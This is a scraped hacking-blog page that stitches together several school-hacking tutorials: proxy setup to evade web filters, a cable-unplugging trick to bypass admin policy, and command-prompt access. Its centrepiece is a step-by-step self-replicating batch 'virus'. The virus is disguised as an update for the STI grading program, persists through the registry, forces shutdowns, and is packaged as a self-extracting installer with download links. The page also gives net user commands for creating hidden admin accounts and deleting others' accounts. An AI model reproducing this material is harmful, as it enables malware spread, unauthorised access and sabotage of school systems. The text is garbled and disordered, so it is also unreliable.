http://www.twitter.com/hackingtruths

I promise to keep you updated with the on goings in the Hacking Truths Blog and keep the topics and conversation similar. Although I’m hoping it will be a bit more lively and informal.

Finally I have decided to surprise you with a special gift. The first 500 followers will be awarded access to  cool Hungry Hacker’s Resource.

See you there…

Both methods should work and I will walk you right through the installation process for both scripts and give you tips how to find out what is actually being blocked. Before we start you need to download a copy of phpproxy or cgiproxy depending on what you want and can use. You also could perform a search for free web hosting on google for instance and try to find a web host that supports one of the two languages, a good site that I found while searching for those terms might be freewebspace.net

1. phpproxy

Download phpproxy and unpack it to a local directory on your hard drive. All you need to do know is to upload the script to your webspace and open up the new url to check if its working allright. You might want to rename the file to something different, something that does not contain the word proxy in it to avoid filters that ban everything that has the word “proxy” in it.

You could open up the script and enter your clients ip in there to make sure that only your client will be able to connect or you could add a .htaccess file to the directory forcing everyone who wants to start the script to enter a username and password. Again, use google if you like to find out more information about .htaccess

The php script has some requirements, make sure you read the readme file which is included and check to see if your hoster has those requirements enabled.
[eminimall]
2. cgiproxy

Your hoster has to have cgi enabled in order to run this script. Many free hosters do not offer cgi or only some preinstalled scripts. Make sure it is enabled before you start the installation process.

First, download the source and unpack it to a local directory.

Now, open the .cgi file and take a look at the configuration. You can edit lots of settings from within, for example you could configure the script that way that it only allows text to go through the proxy but no images. Everything is explained in detail and all options are explained with comments, browse through the file, edit the options to your liking and save the new file.

After that upload the script to your cgi directory if that is required by your hoster and open the url from your browser. You are now ready to browse the web anonymously, to check if that is really the case load a website like whatismyip.com as the first site and check if the ip matches with the server the script is installed and not your computers ip. If that is the case you´ve done everything right and can surf anonymously. (there are still ways to find out your ip, just in case you are wondering)

3. What is being blocked ?

a) If you can access the proxy from the client they only block domains / ips.
b) If you can´t access the proxy they might be banning filenames that contain proxy as well, try changing the filename.

This can be used to gain access to the website you want to for free, and how you can gain access to ‘control panel’, and the various other tools of Windows that may have been blocked from your grasp like ‘regedit’ by the administrator. IT can be used in schools & colleges..

When u are at the log on screen, type in your username and password. Now When you hit enter, and it comes up with the next screen, the rectangle one, immediatly pull out the network cable i.e. the cable wire.

Now you can log on without any restrictions because when the cable is pulled off then it does not download any settings from the server. Now you have access to control panel, & all the other features which had been blocked BUT there will be no network access. But that’s cool because now we can access ‘Internet options’,
click in the ‘connections’ tab click the LAN settings, click the proxy settings, and in the little white box at the bottom we can specify websites that bypass the proxy server (eg www.yahoo.com) Now once you have changed the settings to what you wish, apply them and restart the computer. Now get someone else to log onto it because if you log in it will load the cached settings from your previous log in, then after the other person logs in, everyone that logs in after them included themselves will have the internet settings you specified.

Its only an ‘Unplugging technique’ to gain access to a comp. locked by the administrator.

Now you can gain access to msconfig, regedit, command etc disable the virus scanner, or to install a trojan or a virus according to u’re will..

XP HOME ADVANCED FILE PERMISSIONS.!!

Access *Advance file Permissions* on NTFS file systems for XP Home simply by booting into *Safe Mode*, rt-clicking any file or folder, and navigating to the *Security tab*. This gives the user the ability to allow or deny read, write, execute, read & write, display contents, full-control, iheritance, and take ownership permissions, with many more options available to apply to different users and groups stored on the computer. Well, you don’t have to do this in *Safe Mode* (XP Home). Although it is a little less intuitive, you can simply go to your command prompt – Start>All Programs>Accessories>Command Prompt. Now type “cacls” in the window (without the quotes). This gives you the ability to add, remove or modify file permissions on files and folders through the command prompt. Type “cacls /?” for help on different options and variables. You do not need to be in safe mode to use this so it makes it a little quicker than using the safe mode security tab GUI. Remember – this only applies to NTFS. Here also is a very useful link to find a lot of extras and tweaks straight from the horse’s mouth – the Microsoft Resource Center. You will find a lot of very useful web-based extra’s here, most of them left unknowing to the general public – such as, “Online Crash Analysis” – a site that looks like Windows Update but you can upload your crash “dump logs” (when you get those system or application crash error reports). Microsoft will then analyze the log file and tell you some more info about WHY the system crashed (ie. faulty hardware/software/conflicts, etc).

Now lets c how to open restricted site on college servers
Hungry Hacker recommends : http://unblockall.net/

• Bypass any filters from work or school and access your favorite community and entertainment sites
• Enjoy a fast and reliable connection. Our dedicated machines have 1Gbps connection and 2 quad processors
• Chat with your friends from work
• Watch videos on Youtube
• Login into Myspace, Facebook and all the popular community sites without losing the proxy
• No traffic redirection
• No PopUp and Annoying Ads!

To use our service, simply type the address of the web site which you want to open in the field above and hit GO. This will automatically lead you to the destination page. With our service you are guaranteed to be able to login and operatate normally.

PLEASE DROP IN YOUR COMMENTS BELOW

Howdy Everyone

This tutorial is for those newbies out there, wanting to “hack” their school.

Im gonna start by saying, if your going to hack the school, theres a high probability your get caught, and dont do anything dumb like deleting the network. Its lame, and you will get flamed for doing it. This hack will only allow you to hack the computer at a terminal connected to the network. If you want to remote hack your school, ask google.

Firstly get a feel for the layout of the network.. you can do this quickly by:

Start > Programs(Right Click) > Explore

this will give you a map of the network, and you’ll probably be able to edit and run files this way, but with DOS theres more options…

The basics for school hacking is accessing the command prompt, and 90% of school will have blocked this.

So to get around this you can do two things:

1) input this into the IE address “C:windowssystem32cmd.exe”

however this is very likely to be disabled.

2) Creating a Bat file to open Command Prompt.

You can do this by, opening IE > view > source.

once you have notepad open, where gonna make a .BAT file.

we want the BAT file to open up command prompt, so we type:

“CMD” without the “” press ENTER then save it as file.BAT.

Now you should be able to open Command Prompt by clicking on the file. If it fails to open, it is most likely that the CMD.exe is disabled and you dont have the privilages to run it.

So try using the file COMMAND instead. This does not have the same power as CMD, but is better than nothing.

Once we have it open now comes the good bit….

Before doing this, make sure you know a good lot of DOS commands.

Heres a great list www.computerhope.com/msdos

These are a few that you might like to try:

Net send * “Hungry Hacker is cool”

Shutdown -s -f -m &*92;NAME – rarely works

These will only work if you have the privilages to use them.

After you have access into Command Prompt, to get access to some programs that you are not allowed to use, DIR for Shortcuts (lnk). Then save them onto floppy disk. A shortcut is good, because it is smaller and quicker to save than a whole exe file.

There is also a good chance that the network will have RAT’s installed. A RAT is a (Remote Administration Tool). Used by Admins to manage networks… a bit like a friendly trojan.

This shouldnt be hard to find, and once you have found the EXE or LNK save it to a floppy, – Now you have control over every computer!!

You could use the RAT to use the admins machine, here possibilites are endless!

This is the main command that will be launched upon startup.
Type this in Notepad.
@echo offshutdown.exe -s -t 10 -c
“You have been hacked!”
Save this as shutdown.bat, making sure you choose all files as the filetype.

Step 2
Make it run on StartupThe file you need can be downloaded here:This is just a simple registry file that anyone can create, but I don’t feel like explaining the registry to everyone. It will disguise itself by claiming to be an update for STI.
http://www.mutantsrus.com/Update.reg

Step 3
Set up the replication systemHere is the code to set up the replicator (the program that allows the virus to reproduce). This simply gets it ready to infect the teachers. ?,$, and ! means that it varies. It depends on what program you are using. To find out how to fill these blank, get on a computer that has access to the server that stores your grading program. ? is the drive letter. $ is any folders and sub folders that contain the main exe for the grading program. ! is the name of the main exe.

Example O:\sti\ssts2\sti.exe?=O$=sti\ssts2!=sti

Here is the code:

@echo offcd C:\move ?:\$\!.exeren C:?.exe real.exeren C:virus.exe !.execd ?:\$move C:\!.exemove C:\shutdown.batmove C:\Update.regexit

Save this as global.bat

Step 4
They grow up so fast — real fast!This script will infect any teacher that uses STI with the shutdown command. The little viral babies will copy themselves to the user’s hard drive and remain there.

@echo offcd C:\WINDOWSEcho STI must update itself, this will only take a few seconds.pauseEcho Please wait while the files install.move ?:\$\shutdown.batmove ?:\$\Update.regmove ?:\$\cure.exemove ?:\$\cure.exemove ?:\$\cure.batmove ?:\$\remove.batEcho Adding information to registry.pausestart regedit.exe Update.regcd ?:\$start real.exeexit
Now this one has to be in exe form. So save it as virus.bat, then compile it in Quick Batch File Compiler. You can get QuickBFC here: QuickBFC and download this file as a template for QuickBFC to work with. Just save the compiled file over this one.

Step 5
The CureThis is a little tool that can fix all damage done by your virus, it works in the same way that the virus works, but works to correct the problem rather than create it.
@echo off
shutdown -acd C:\WINDOWSdel shutdown.bat

Save as cure.bat

@echo offcd ?:\$del !.execd C:\move ?:\$\real.exeren C:\real.exe !.execd ?:\$move C:\?.execd C:\WINDOWS
Now download this file: http://www.mutantsrus.com/cure.exe

Step 6
The SetupNo it’s not the name of a heist movie. It is simply a SFX file that extracts all the files to their proper places and places the replicator in the STI drive.I am going to use WinRAR to do this. You can get WinRAR here: http://www.rarlab.com. First gather all the files you have made thus far. The files should be shutdown.bat, Update.reg, virus.exe, cure.exe, cure.bat, remove.bat and global.bat. Now select them all and put them in a .rar file. Then open Winrar and go to “tools”, then select “convert archive to SFX”. Click “Advanced SFX Options” In the field labeled Path to Extract, type C:\WINDOWS In the field labeled Run After Extraction, type C:\WINDOWS\global.bat Save the finished file anywhere you want and as any name. To install the virus, just run this program on a computer at school that is connected to the server that has the grading program on it (such as any computer in the Comp Lab.)

C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they’ll just think its a student who really is at school, when really, the person doesn’t EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called ‘username’, with the password being ‘password’. The below would have a username of ‘JohnSmith’ and a password of ‘fruity’

C:>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let’s delete them:)

C:>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith’s account. Awww. Do it to you enemies:P no only joking becuase they could have important work… well okay only if you REALLY hate them:)

Let’s give you admin priveleges:)

C:>net localgroup administrator JohnSmith /ADD

This will make JohnSmith an admin. Remember that some schools may not call their admins ‘adminstrator’ and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup

Running .exe files you can’t usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.

Well, I hope this article helped a bit. Please vote for me if you liked it:) Also, please don’t go round screwing up your school servers, they are providing them free to you to help your learning.

I will add more as I learn more and remember stuff (I think I’ve left some stuff out – this article could get very long…)

Net Send * “The server is h4x0r3d”

*Note: may not be necessary, depending on how many your school has access too. If it’s just one, you can leave it out*

Where is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Varndean * “The server is h4x0r3d”

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people’s accounts, for example

NetSend Varndean dan,jimmy,admin “The server is h4x0r3d”

use commas to divide the names and NO SPACES between them.

3) Use a proxy. I recommend Proxify.com. If your school has blocked it, search it up on Google and do the above. Then you can search to your heart’s content:)

and save the file as batch.bat, or anything with the extension .bat . Open this file and it will give you a command prompt:) (for more information on why this works, look to the end of the article). REMEMBER TO DELETE THIS FILE ONCE YOU’VE FINISHED!!! if the admins see it, they will kill you;)

There are problems with school servers, and they mostly come back to the basic architecture of the system – so the admins are unlikely to do anything about it! In this article I will discuss how to bypass web filtering software at school, send messages everywhere you want, create admin accounts, modify others’ accounts, and generally cause havok. Please note that I ahve refrained from giving away information that will actually screw up your school server, though intelligent thinkers will work it out. This is because, for god sakes, this is a school! Don’t screw them up!